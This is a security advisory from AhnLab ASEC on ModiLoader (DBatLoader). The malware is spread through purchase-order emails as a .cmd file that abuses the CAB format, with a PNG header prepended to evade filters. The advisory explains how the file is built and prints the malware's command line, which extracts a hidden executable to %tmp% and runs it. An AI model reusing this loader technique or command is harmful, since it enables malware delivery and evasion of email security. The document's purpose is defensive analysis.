Warning Against ModiLoader (DBatLoader) Spreading via MS Windows CAB Header Batch File (*.cmd)
In December 2024, AhnLab SEcurity intelligence Center (ASEC) identified the distribution of malware using MS Windows CAB header batch file (*.cmd) with AhnLab’s email honeypot.
The malware known as ModiLoader (DBatLoader) was being distributed through purchase orders (PO).
The difference from the past cases is that while the current malware uses the *.cmd (batch file) extension, it actually abuses the CAB compression header format to create and execute the malware as a loader type.
Binary Structure: CAB header (MSCF) + Command line + PE (exe)
Extension: *.cmd
The malware is also known in the global scene, once introduced in a post titled Threat Actor Turns a CAB File Into the Loader to Deploy ModiLoader.
Figure 1. An email distributing ModiLoader (DBatLoader)
The threat actor altered the header of the attached file to bypass email security products. The identified compressed file is a CAB file with a magic header of MSCF, but it is suspected that PNG (image file header) was added in front to bypass file filtering or automatic inspection of files within the archive.
Figure 2. The header of the compressed file attached to the email
Inside the compressed file, there is a normal image file and a malicious batch file (*.cmd) using the MS Windows CAB format.
Figure 3. The list of files within the compressed file attachment
The CMD batch file has a unique structure as shown below, consisting of a CAB structure, command instructions, and an executable file. It can function as a loader through the command instructions.
Figure 4. CAB-type loader executing ModiLoader (DBatLoader) (File name: PO_SK336.cmd)
To create a CAB structure that can be extracted with extrac32, the size must be set correctly for each block starting from the coffCabStart offset. cCFData indicates the number of blocks, but it can be set arbitrarily without affecting functionality.
The execution process of the distributed PO_SK336.cmd file is as follows:
1) Execute the command line, ignoring the header in the front
2) Decompresses itself (CAB structure) via extrac32
3) Creates an internal executable file (EXE) in the %temp% folder and runs the file
The command line instructions are as follows:
cls && extrac32 /y "%~f0" "%tmp%\x.exe" && start "" "%tmp%\x.exe"
Final Malware Creation Path
Figure 5. The creation path (%temp%) of ModiLoader (DBatLoader)
Users should be particularly cautious regarding attached files.
Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner below.
